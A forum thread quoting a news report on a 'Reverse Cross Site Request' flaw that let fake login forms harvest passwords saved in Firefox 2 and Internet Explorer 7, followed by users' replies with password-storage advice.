Firefox 2 and Internet Explorer 7 could allow attackers to steal passwords

Dubbed a Reverse Cross Site Request vulnerability (RCSR) by its discoverer Robert Chapin, the flaw allows hackers to compromise users' passwords and usernames by presenting them with a fake login form.

Firefox Password Manager will automatically enter any saved passwords and usernames into the form. The data is then automatically sent to an attacker's computer without the user's knowledge, according to the Chapin Information Services (CIS) site.

An exploit for this flaw has already been seen on social networking site MySpace, and could affect anyone using a blog or forum that allows user-generated HTML code to be added, according to Chapin.

"Users of both Firefox and Internet Explorer need to be aware that their information can be stolen in this way when visiting blog and forum websites at trusted addresses," claimed Chapin.

_____________

I don't think I'll activate the Password Manager in FF anytime soon...

/Claes

A very good reason to never use the password manager included in these programs, or any other program for that matter.

If you have to many usernames and passwords to remember then I would suggest writing them down either on a bit of paper or in a text file on your computer. If you are worried about of users of a computer finding these then I would suggest writing the info in a text file then downloading PGP, free for non-commercial use, and using this to encrypt the text file.

If you want to view blogs and you have information in your password manager then it may be worthwhile downloading the Opera internet browser as this does not seem to be vulnerable to the same flaw, and using this to view any blogs etc until a security patch for these products is released.